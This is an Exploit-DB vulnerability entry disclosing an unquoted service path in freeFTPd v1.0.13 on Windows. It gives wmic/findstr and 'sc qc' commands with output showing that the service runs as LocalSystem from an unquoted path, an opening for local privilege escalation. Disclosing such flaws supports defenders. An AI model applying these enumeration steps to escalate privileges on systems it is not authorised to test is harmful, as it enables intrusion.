freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path

EDB-ID:

48043

CVE:

N/A


Author:

boku

Type:

local


Platform:

Windows

Date:

2020-02-11


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService                           C:\Program Files\freeSSHd\freeFTPdService.exe                                      Auto

C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: freeFTPdService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\freeFTPdService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : freeFTPdService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem